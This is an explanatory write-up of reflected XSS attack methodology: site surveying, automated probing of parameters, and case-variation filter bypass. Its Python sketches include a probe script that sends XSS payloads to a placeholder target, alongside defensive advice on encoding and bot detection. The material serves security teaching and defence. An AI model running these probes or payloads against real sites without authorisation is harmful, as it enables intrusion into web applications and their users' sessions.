
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Some sensitive characters are consistently encoded, but others are not. For example, within an HTML tag attribute the payload may not be able to break out of the quotes in order to inject another attribute. Note that sometimes the payload is properly encoded in one part of the page but not encoded at all in another section of the same page (the title, for instance). In a well-protected application, all context-sensitive characters are consistently re-encoded before being sent to the web browser.

The attacker's script string is reflected verbatim at some point in the web site (if not on the same page). The unique identifier embedded in the probe helps to trace the flow of the possible XSS, since the payload may be stored and served later. User-controllable input is output back to the browser; e.g., ?error="File not Found" becomes "File not Found" in the title of the web page. The output of pages includes some form of a URL parameter.
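As a rough illustration of this inconsistency, the sketch below (Python, with hypothetical render_body and render_title helpers) re-encodes context-sensitive characters in one output context but echoes the same user input verbatim in another, which is exactly the kind of gap the probes described here are meant to reveal.

    import html

    def render_body(error_message: str) -> str:
        # Context-sensitive characters (<, >, &, ", ') are re-encoded here,
        # so a probe such as <script>alert(1)</script> renders inert.
        return f"<p>Error: {html.escape(error_message, quote=True)}</p>"

    def render_title(error_message: str) -> str:
        # Hypothetical oversight: the same input is echoed verbatim in the
        # page title, so the probe is reflected without any encoding.
        return f"<title>{error_message}</title>"

    if __name__ == "__main__":
        probe = '"><script>alert("probe-7f3a")</script>'  # carries a unique identifier
        print(render_body(probe))   # encoded output
        print(render_title(probe))  # verbatim reflection: potential XSS sink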
Attempt injection payload variations on input parameters: possibly using an automated tool, an attacker requests variations on the inputs he surveyed before, sending parameters that include variations of payloads. The payloads are designed to bypass incomplete filtering (e.g., incomplete HTML encoding) and try many variations of character injection that could enable the XSS payload. He records all responses from the server that include unmodified versions of his script. Use a list of XSS probe strings to inject into parameters of known URLs; if possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax, and encoding, and use a proxy tool to record the results of manually entering XSS probes in known URLs (a sketch of this step follows below).

To defend against this probing, actively monitor the application and either deny or redirect requests from origins that appear to be automated, and use CAPTCHA to prevent the use of the application by an automated tool. Monitor the velocity of page fetching in web logs: humans who view a page and select a link from it click far slower and far less regularly than tools, which make requests very quickly and space them apart regularly (e.g., 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers; using iframes, images, or other HTML techniques, the links can be hidden from humans browsing the site but remain visible to spiders and programs. A request for such a page then becomes a good predictor of an automated tool probing the application.
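To make the probing step concrete, here is a minimal Python sketch; the target URL, parameter name, and payload set are illustrative assumptions, and the third-party requests library is used for the HTTP calls. It sends several form, case, and syntax variations of a payload, each tagged with a unique identifier, and records which responses reflect the probe unmodified. A real assessment would only run such probes against systems the tester is authorized to examine.

    import uuid
    import requests  # third-party; pip install requests

    TARGET = "http://testsite.example/search"   # hypothetical URL surveyed earlier
    PARAM = "q"                                  # hypothetical parameter name

    def probe_variations(marker: str):
        # Variations on form, syntax, and case of the same basic payload.
        return [
            f"<script>alert('{marker}')</script>",
            f"<ScRiPt>alert('{marker}')</ScRiPt>",        # case variation
            f"\"><script>alert('{marker}')</script>",     # attribute breakout
            f"<img src=x onerror=alert('{marker}')>",     # alternate tag/handler
        ]

    def run_probes():
        reflected = []
        for payload in probe_variations(uuid.uuid4().hex[:8]):
            resp = requests.get(TARGET, params={PARAM: payload}, timeout=10)
            # Record responses that contain the probe string unmodified.
            if payload in resp.text:
                reflected.append((payload, resp.url))
        return reflected

    if __name__ == "__main__":
        for payload, url in run_probes():
            print(f"unfiltered reflection of {payload!r} at {url}")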

URL parameters are used by the application or the browser (DOM). Using URL rewriting, parameters may also be part of the URL path, and even though none appear, the web application may still use them if they are provided. Many browser plugins are available to facilitate the analysis or to automate URL discovery. From this survey the attacker creates a list of URLs with their corresponding parameters, a list of application user-interface entry fields, and a list of resources accessed by the application. Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
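The list-building described above can be partly automated with the standard library alone. The sketch below is a hypothetical example: it parses one captured HTML page (the file name is an assumption) and extracts URL parameters from links as well as the names of user-interface entry fields.

    from html.parser import HTMLParser
    from urllib.parse import urlparse, parse_qs

    class EntryPointCollector(HTMLParser):
        """Collects link parameters and form input names from one HTML page."""
        def __init__(self):
            super().__init__()
            self.url_params = {}   # URL path -> set of parameter names
            self.form_fields = []  # names of user-interface entry fields

        def handle_starttag(self, tag, attrs):
            attrs = dict(attrs)
            if tag == "a" and "href" in attrs:
                parsed = urlparse(attrs["href"])
                if parsed.query:
                    self.url_params.setdefault(parsed.path, set()).update(parse_qs(parsed.query))
            elif tag in ("input", "textarea", "select") and "name" in attrs:
                self.form_fields.append(attrs["name"])

    if __name__ == "__main__":
        collector = EntryPointCollector()
        # Hypothetical page captured during the manual walk-through.
        with open("captured_page.html", encoding="utf-8") as fh:
            collector.feed(fh.read())
        print("URLs with parameters:", collector.url_params)
        print("Entry fields:", collector.form_fields)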

Use a browser to manually explore the website and analyze how it is constructed.


Using a browser or an automated tool, an attacker follows all public links on a web site. Use a spidering tool to follow and record all links, or use a proxy tool to record all links visited during a manual traversal of the web application. Manual traversal of this type is frequently necessary to identify forms that use the GET method rather than POST. Make special note of any links that include parameters in the URL.

The attacker then uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case-insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before comparing them with forbidden keywords, it is possible to bypass filters (e.g., incomplete blacklists) by using an alternate case structure: the "script" tag written as "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible, as are pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.
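The case-normalization weakness is easy to demonstrate. In the hypothetical Python sketch below, a filter that tests only the lowercase keyword is bypassed by the alternate form "ScRiPt", while a filter that converts the input to a consistent case before the comparison catches it.

    FORBIDDEN = ["<script"]  # hypothetical incomplete blacklist

    def naive_filter(value: str) -> bool:
        # Compares against the forbidden keyword in one case only.
        return not any(bad in value for bad in FORBIDDEN)

    def normalized_filter(value: str) -> bool:
        # Converts the input to a consistent case before the comparison.
        lowered = value.lower()
        return not any(bad in lowered for bad in FORBIDDEN)

    if __name__ == "__main__":
        payload = "<ScRiPt>alert(1)</ScRiPt>"
        print(naive_filter(payload))       # True  -> payload slips past the filter
        print(normalized_filter(payload))  # False -> alternate case is caught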
